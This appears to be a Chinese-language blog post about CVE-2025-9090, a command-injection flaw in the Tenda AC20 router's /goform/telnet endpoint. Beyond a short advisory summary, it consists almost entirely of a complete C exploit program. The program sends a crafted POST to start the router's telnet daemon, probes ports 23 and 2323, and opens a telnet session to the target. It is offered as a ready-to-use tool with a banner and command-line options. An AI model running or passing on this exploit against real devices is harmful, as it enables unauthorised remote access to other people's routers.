Tenda AC20 16.03.08.12 命令注入漏洞利用详解

本文详细分析了Tenda AC20路由器16.03.08.12版本中的命令注入漏洞(CVE-2025-9090),并提供了一个完整的C语言漏洞利用程序。该程序通过发送特制的HTTP POST请求,利用Telnet服务中的websFormDefine函数漏洞执行任意命令。

Tenda AC20 16.03.08.12 命令注入漏洞

发布日期:2025年8月20日 提交者:匿名 风险等级:中 攻击位置:本地:否 | 远程:是 CVE编号:CVE-2025-9090 CWE分类:CWE-78(OS命令注入)

漏洞概述

在Tenda AC20路由器的16.03.08.12版本中发现一个安全漏洞。受影响的组件是Telnet服务,具体位于/goform/telnet文件中的websFormDefine函数。

  • 目标端点/goform/telnet
  • 服务位置http://<IP>
  • 完整目标URLhttp://<IP>/goform/telnet

漏洞利用方案

  1. 构建完整的URL。
  2. 准备POST数据(包含Sleep和libcurl函数)。
  3. 通过CURL发送POST请求。
  4. 评估响应:HTTP状态码、telnet端口(23)访问情况、错误关键词(如“not found”)。
  5. 确定攻击是否成功并完成利用。

漏洞利用代码(C语言)

以下是一个完整的漏洞利用程序,用于演示和验证该漏洞。

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
#include <stdio.h>
#include "argparse.h"
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <arpa/inet.h>
#include <time.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <errno.h>
#define MAX_RESPONSE (50 * 1024 * 1024)
#define URL 2400
#define BUFFER 4500
const char *ipT = NULL;
const char *cookies = NULL;
int loopF = 0;
int verbose = 0;
int fileCookies = 0;

// 系统调用退出函数
void exit64bit()
{
    fflush(NULL);
    __asm__ volatile
    (
        "syscall\n\t"
        :
        : "A"(0x3C),
          "D"(0)
        : "rcx",
          "r11",
          "memory"
    );
    fflush(NULL);
}

// 内存结构体,用于存储HTTP响应
struct Mem
{
    char *buffer;
    size_t len;
};

// CURL写回调函数
size_t write_cb(void *ptr,
    size_t size,
    size_t nmemb,
    void *userdata)
{
    if (!userdata)
    {
        return 0;
    }
    if (size && nmemb > SIZE_MAX / size)
    {
        fprintf(stderr, "\e[0;31m[-] size * nmemb overflow !\e[0m\n");
        return 0;
    }
    size_t total = size * nmemb;
    struct Mem *m = (struct Mem *)userdata;
    if (total > MAX_RESPONSE || (m->len + total + 1) > MAX_RESPONSE)
    {
        fprintf(stderr, "\e[0;31m[-] Response too large or would exceed MAX_RESPONSE !\e[0m\n");
        return 0;
    }
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (tmp == NULL)
    {
        fprintf(stderr, "\e[1;31m[-] Failed to allocate memory!\e[0m\n");
        exit64bit();
    }
    m->buffer = tmp;
    memcpy(&(m->buffer[m->len]), ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}

// 检查字符串长度是否超出缓冲区容量
int checkLen(int len, char *buf, size_t bufcap)
{
    if (len < 0 || (size_t)len >= bufcap)
    {
        printf("\e[0;31m[-] Len is Long ! \e[0m\n");
        printf("\e[0;31m[-] Len %d\e[0m\n", len);
        return 1;
    }
    else
    {
        printf("\e[0;34m[+] Len Is Not Long.\e[0m\n");
        return 0;

    }
    return 0;
}

// 清理CURL对象、响应缓冲区等资源
void cleanObject(CURL *c, struct curl_slist *h, char *r, size_t l)
{

    printf("\e[0;33m[+] Clean Headers...\e[0m\n");
    if (h != NULL)
    {
        curl_slist_free_all(h);
    }
    if (c != NULL)
    {
        curl_easy_cleanup(c);
    }
    printf("\e[0;33m[+] Clean CURL...\e[0m\n");
    if (r != NULL)
    {
        free(r);
        r = NULL;
        l = 0;
    }
    printf("\e[0;33m[+] Clean response buffer and len...\e[0m\n");
    printf("\e[0;31m[+] Exit ....\n");
}

// 动态设置socket超时时间
int sleepSocket()
{
    static int current = 2;
    int timeout = current;
    printf("\e[0;34m[+] Timeout Socket : %d\n", timeout);
    current++;
    if (current > 6)
    {
        current = 2;
    }
    return timeout;
}

// 尝试连接目标IP的Telnet端口(23和2323)
int connectionTelnet(const char *ip)
{
    int ports[] =
    {
        23,
        2323
    };
    int num_ports = sizeof(ports) / sizeof(ports[0]);
    for (int i = 0; i < num_ports; i++)
    {
        printf("\e[0;36m[+] target PORT Connection telnet : %d\e[0m\n", ports[i]);
        printf("\e[0;36m[+] Try Connection in port : %d\e[0m\n", ports[i]);
        int s;
        char buffer[BUFFER];
        struct sockaddr_in server;
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0)
        {
            perror("\e[0;31m[-] Error Create Socket !\e[0m\n");
            return -1;
        }
        server.sin_addr.s_addr = inet_addr(ip);
        server.sin_family = AF_INET;
        server.sin_port = htons(ports[i]);
        struct timeval timeout;

        int value3  = sleepSocket();
        timeout.tv_sec = value3;
        timeout.tv_usec = 0;
        if (setsockopt(s,
            SOL_SOCKET,
            SO_RCVTIMEO,
            (const char*)&timeout,
            sizeof(timeout)) < 0)
        {
            perror("\e[0;31m[-] setsockopt() Failed !\e[0m\n");
            exit64bit();
        }
        printf("\e[0;33m[+] Timeout Connection socket ...\e[0m\n");

        if (connect(s,
            (struct sockaddr *)&server,
            sizeof(server)) < 0)
        {
            perror("\e[0;31m[-] Connect failed in Target Ip.\e[0m\n");
            close(s);
            continue;
        }
        printf("[+] Connection Success in server.\e[0m\n");
        char banner[256];
        int n = recv(s,
            banner,
            sizeof(banner)-1,
            0);
        if (n > 0)
        {
            banner[n] = '\0';
            printf("\e[0;36m[+] Telnet Banner: %s\e[0m\n", banner);
        }

        close(s);
        if (verbose)
        {
            printf("\e[0;33m[+] Close Socket...\e[0m\n");
        }
        return ports[i];
    }
    return -1;
}

// 通过fork和execve执行系统命令(telnet连接)
int systemCommand(const char *ip)
{
    pid_t pid;
    printf("\e[0;37m[+] Before fork (PID : %d)\e[0m\n", getpid());
    pid = fork();
    if (pid < 0)
    {
        fprintf(stderr, "\e[0;31m[-] Fork failed !\e[0m\n");
        return 1;
    }
    else if (pid == 0)
    {
        int access[] = {23, 2323, 80};
        int numberAccess = sizeof(access) / sizeof(access[0]);
        for (int a = 0; a < numberAccess ; a++)
        {
            printf("\e[0;34m[+] child process (pid : %d)\e[0m\n", getpid());
            printf("\e[0;34m[+] sys_execve syscall...\e[0m\n");
            char ipS[90];

            int lenIp = snprintf(ipS, sizeof(ipS), "%s", ip);
            if (checkLen(lenIp,ipS,sizeof(ipS)) == 1)
            {
                printf("\e[0;31m[-] Len Content (Target IP) is Long !\e[0m\n");
                printf("\e[0;31m[-] Result Len (ip) : %d\e[0m\n",
                    lenIp);
                exit64bit();
            }
            char portsA[40];
            int lenA = snprintf(portsA, sizeof(portsA), "%d", access[a]);
            if (checkLen(lenA,portsA,sizeof(portsA)) == 1)
            {
                printf("\e[0;31m[-] Len Content (Target port) is Long !\e[0m\n");
                printf("\e[0;31m[-] Result Len (port) : %d\e[0m\n",
                    lenA);
                exit64bit();
            }
            const char *c = "/usr/bin/telnet";
            char *const argv[] =
                {
                    "telnet",
                    ipS,
                    portsA,
                    NULL
                };

            const char *envp[] = {NULL};
            __asm__ volatile
            (
                "mov $59, %%rax\n\t"
                "mov %[command], %%rdi\n\t"
                "mov %[v], %%rsi\n\t"
                "mov %[e], %%rdx\n\t"
                "syscall\n\t"
                :
                : [command] "r"(c),
                  [v] "r"(argv),
                  [e] "r" (envp)
                :"rax",
                 "rdi",
                 "rsi" ,
                 "rdx"
            );
            __asm__ volatile
            (
                "mov $0x3C, %%rax\n\t"
                "xor %%rdi, %%rdi\n\t"
                "syscall\n\t"
                :
                :
                :"rax",
                 "rdi"
            );
        }

    }
    else
    {
        waitpid(pid,
            NULL,
            0);
        printf("\e[0;36m[+] Child process finished.\e[0m\n");
    }
    return 0;
}

// 主漏洞利用函数:向目标端点发送POST请求并检查响应
void endPoint(const char *ip)
{
    CURL *curl = curl_easy_init();
    struct Mem response ;
    response.buffer = NULL;
    response.len = 0;
    struct curl_slist *headers = NULL;
    if (response.buffer == NULL && response.len == 0)
    {
        if (verbose)
        {
            printf("\e[0;35m==============================\e[0m\n");
            printf("\e[0;34m[+] Clean Response...\e[0m\n");
            printf("\e[0;34m[+] Response buffer is NULL.\e[0m\n");
            printf("\e[0;34m[+] Response len is 0.\e[0m\n");
            printf("\e[0;34m[+] Clean Success.\e[0m\n");
            printf("\e[0;35m==============================\e[0m\n");
        }
    }
    else if (response.buffer != NULL && response.len != 0)
    {
        if (verbose)
        {
            printf("\e[0;31m[-] Response buffer is NOT NULL And len (!=0).\e[0m\n");
            printf("\e[0;31m[-] Clean Failed.\e[0m\n");
        }
    }
    if (!curl)
    {
        printf("\e[0;31m[-] Error Create Object CURL !\e[0m\n");
        exit64bit();
    }
    CURLcode code;
    if (curl)
    {
        char full[URL];
        int len = snprintf(full, URL, "http://%s/goform/telnet",ip);
        if (checkLen(len,full,URL) == 1)
        {
            printf("\e[0;31m[-] Len Content (Full URL) is Long !\e[0m\n");
            printf("\e[0;31m[-] Result Len (FULL URL) : %d\e[0m\n", len);
            cleanObject(curl,
                    headers,
                    response.buffer,
                    response.len);
            exit64bit();
        }
        printf("\e[0;34m[+] Write Success IP in FULL url.\n");
        printf("\e[0;32m[+] Len Full url : %d\n", len);
        printf("\e[0;37m[+] Target IP Address : %s\n", ip);
        printf("\e[0;37m[+] FULL URL : %s\n", full);
        if (verbose)
        {
            printf("\e[0;37m[+] Check Range IP ...\n");
        }
        struct in_addr inaddr;
        if (inet_aton(ip, &inaddr))
        {
            printf("\e[0;36m[+] The address '%s' is valid.\n", ip);

        }
        else
        {
            printf("\e[0;31m[-] The address '%s' Not valid.\n", ip);
            cleanObject(curl,
                    headers,
                    response.buffer,
                    response.len);
            exit64bit();
        }
        curl_easy_setopt(curl,
                    CURLOPT_URL,
                    full);
        if (fileCookies)
        {
            curl_easy_setopt(curl,
                            CURLOPT_COOKIEFILE,
                            cookies);
            curl_easy_setopt(curl,
                            CURLOPT_COOKIEJAR,
                            cookies);
        }
        curl_easy_setopt(curl,
                        CURLOPT_FOLLOWLOCATION,
                        1L);

        curl_easy_setopt(curl,
                        CURLOPT_WRITEFUNCTION,
                        write_cb);
        curl_easy_setopt(curl,
                        CURLOPT_WRITEDATA,
                        &response);
        curl_easy_setopt(curl,
                        CURLOPT_CONNECTTIMEOUT,
                        5L);
        uint64_t raxValue;
        raxValue = 0xE6;
        if (verbose)
        {
            if (raxValue == 0xE6)
            {

                printf("\e[0;34m[+] RAX Value (SLEEP) (HEX): 0x%lX\e[0m\n",(uint64_t)raxValue);
            }
            else
            {
                printf("\e[0;31m[-] RAX Value Not (230): 0x%lX\e[0m\n",(uint64_t)raxValue);
                cleanObject(curl,
                    headers,
                    response.buffer,
                    response.len);
                exit64bit();
            }
        }
        struct timespec rqtp, rmtp;
        rqtp.tv_sec  = 1;
        rqtp.tv_nsec = 500000000;
        register long reg_r10 asm("r10");
        reg_r10 = 0;
        printf("\e[0;33m[+] Sleeping Clock Syscall Assembly (%ld seconds) && (%ld nanoseconds)...\e[0m\n",
               rqtp.tv_sec, rqtp.tv_nsec);
        int ret;
        __asm__ volatile
        (
            "syscall"
            : "=a"(ret)
            : "a"(raxValue),
              "D"((long)0),
              "S"((long)0),
              "d"(&rqtp),
              "r"(reg_r10)
            : "rcx", "r11", "memory"
        );
        printf("\e[0;37m[+] Return Value sys_clock_nanosleep : %d\e[0m\n", ret);
        if (ret == -1)
        {
            if (errno == EINTR)
            {
                printf("\e[0;34m[+] Sleep was interrupted. Remaining : %ld seconds %ld nanoseconds\e[0m\n",
                    rqtp.tv_sec,
                    rqtp.tv_nsec);
            }
            else
            {
                perror("\e[0;31m[-] Error sys_clock_nanosleep !\e[0m\n");
            }
        }
        else
        {
            printf("\e[0;34m[+] SLeep Success.\e[0m\n");
        }
        curl_easy_setopt(curl,
                            CURLOPT_TIMEOUT,
                            10L);
        curl_easy_setopt(curl,
                        CURLOPT_SSL_VERIFYPEER,
                        0L);
        curl_easy_setopt(curl,
                        CURLOPT_SSL_VERIFYHOST,
                        0L);
        if (verbose)
        {
            printf("\e[0;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
            curl_easy_setopt(curl,
                            CURLOPT_VERBOSE,
                            1L);
        }

        headers = curl_slist_append(headers,
                                    "Accept: text/html");
        headers = curl_slist_append(headers,
                                    "Accept-Encoding: gzip, deflate, br");
        headers = curl_slist_append(headers,
                                    "Accept-Language: en-US,en;q=0.5");
        curl_easy_setopt(curl, CURLOPT_POST, 1L);
        curl_easy_setopt(curl, CURLOPT_POSTFIELDS, "");
        curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, 0L);
        curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
        code = curl_easy_perform(curl);

        long http_code = 0;
        if (code == CURLE_OK)
        {
            printf("\e[0;36m[+] Request sent successfully.\e[0m\n");
            if (verbose)
            {
                printf("\e[0;35m=========================================================== [ response (1)] ===========================================================\e[0m\n");
                printf("\n%s\n", response.buffer);
                printf("\e[0;35m=======================================================================================================================================\e[0m\n");
            }
            curl_easy_getinfo(curl,
                    CURLINFO_RESPONSE_CODE,
                    &http_code);
            printf("\e[0;32m[+] Http Code : %ld\e[0m\n",
                    http_code);
            if (http_code >= 200 && http_code < 300)
            {
                printf("\e[0;36m[+] Http code in Range (200 - 300).\e[0m\n");
                printf("\e[0;35m=========================================================== [ response (code 200) ] ===========================================================\e[0m\n");
                printf("\n%s\n", response.buffer);
                printf("\e[0;35m===============================================================================================================================================\e[0m\n");
                printf("\e[0;35m[+] Check response server...\e[0m\n");
                if (response.buffer)
                {
                    if (strstr(response.buffer, "load telnetd success") != NULL)
                    {
                        printf("\e[0;37m[+] Word found in response : \"load telnetd success\"\e[0m\n");
                        printf("\e[0;36m[+] Injected successfully.\e[0m\n");
                    }
                }
                printf("\e[0;33m[+] Try telnet Connection (Socket) (23)...\e[0m\n");
                printf("\e[0;36m[+] Command : telnet %s %d\e[0m\n", ip, 23);
                int value = connectionTelnet(ip);
                printf("\e[0;35m[+] Result Connection : =============================\e[0m\n");
                int useCommand = 0;
                if (value == -1)
                {
                    printf("\e[0;31m[-] CVE-2025-9090 Not detect !\n");
                    printf("\e[0;37m[+] Run Command System (telnet %s %d)\n", ip, 80);
                    useCommand++;
                    goto command;
                }
                else if (value != -1)
                {
                    printf("\e[0;36m[+] Success Connection PORT : %d\e[0m\n", value);
                    printf("\e[0;36m[+] The server has a vulnerability Os injection (CVE-2025-9090 )\e[0m\n");
                }
                command:
                    if (useCommand  != 0)
                    {
                        int value2 = systemCommand(ip);
                        if (value2 == 1)
                        {
                            printf("\e[0;31m[-] Error Run command , Please Check ENV.\e[0m\n");
                        }
                        else if (value2 == 0)
                        {
                            printf("\e[0;34m	[+] Run command Success.\e[0m\n");
                        }
                    }

                printf("\e[0;35m=====================================================\e[0m\n");

            }
            else
            {
                printf("\e[0;31m[-] Http code Not range (200 - 300)!\e[0m\n");
                printf("\e[0;35m[-] Check the reason for a negative response...\e[0m\n");
                if (response.buffer)
                {
                    response.buffer[response.len] = '\0';
                    if (strstr(response.buffer, "Not found") != NULL ||
                        strstr(response.buffer, "was not found on this server") != NULL)
                    {
                        printf("\e[0;31m[-] Word Found in Response (Not found)\e[0m\n");
                        printf("\e[0;31m[-] Not found endpoint !\e[0m\n");
                        printf("\e[0;31m[-] Please Check Download Service \"Tenda AC20\" And run.\e[0m\n");
                    }
                }
                else
                {
                    printf("\e[0;31m[-] Response is NULL, Error Check response !\e[0m\n");
                }

            }
        }
        else
        {
            fprintf(stderr, "\e[0;31m[-] The request was not sent !\e[0m\n");
            printf("\e[0;31m[-] Error : %s\e[0m\n", curl_easy_strerror(code));
            exit64bit();

        }
    }

}

// 主函数:解析命令行参数并启动漏洞利用
int main(int argc, const char **argv)
{
    // 显示程序横幅
    printf(
        "\e[1;31m"

        "	 ▄████▄ ██▒   █▓▓█████     \n"
        "	▒██▀ ▀█▓██░   █▒▓█   ▀     \n"
        "	▒▓█    ▄▓██  █▒░▒███       \n"
        "	▒▓▓▄ ▄██▒▒██ █░░▒▓█  ▄     \n"
        "	▒ ▓███▀ ░ ▒▀█░  ░▒████▒   \e[1;32m2025-9090\n"
        "	░ ░▒ ▒  ░ ░ ▐░  ░░ ▒░ ░    \n"
        "	  ░  ▒    ░ ░░   ░ ░  ░    \n"
        "	░           ░░     ░       \n"
        "	░ ░          ░     ░  ░    \n"
        "	░           ░              \n"
            "\t  \e[1;31m [ Byte Reaper ] \e[0m\n"
    );
    printf("\e[0;31m-------------------------------------------------------------------------------------------------------\e[0m\n");
    // 定义命令行参数选项
    struct argparse_option options[] =
    {
        OPT_HELP(),
        OPT_STRING('i',
                   "ip",
                   &ipT,
                   "Enter Target IP"),
        OPT_STRING('c',
                   "cookies",
                   &cookies,
                   "Enter File cookies"),
        OPT_BOOLEAN('v',
                    "verbose",
                    &verbose,
                    "Verbose Mode"),
        OPT_INTEGER('f',
            "loop",
            &loopF,
            "Number request (-f 4  = 4 request)"),
        OPT_END(),
    };
    struct argparse argparse;
    argparse_init(&argparse,
                  options,
                  NULL,
                  0);

    argparse_parse(&argparse,
                   argc,
                   argv);
    // 检查必须的目标IP参数
    if (ipT == NULL)
    {
        printf("\e[1;31m[-] Please Enter target Ip !\e[0m\n");
        printf("\e[1;31m[-] Example : ./CVE-2025-9090 -i <IP> \e[0m\n");
        exit64bit();
    }
    if (cookies != NULL)
    {
        fileCookies = 1;
    }
    if (verbose)
    {
        verbose = 1;
    }
    // 支持循环多次发送请求
    if (loopF != 0)
    {

        printf("\e[0;34m[+] Number Loop Request : %d\e[0m\n", loopF);
        for (int n = 0; n <= loopF; n++)
        {
            printf("\e[1;35m[+] Another request: =============================================\e[0m\n");
            endPoint(ipT);
        }
    }
    // 执行一次漏洞利用
    endPoint(ipT);
    return 0;
}
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计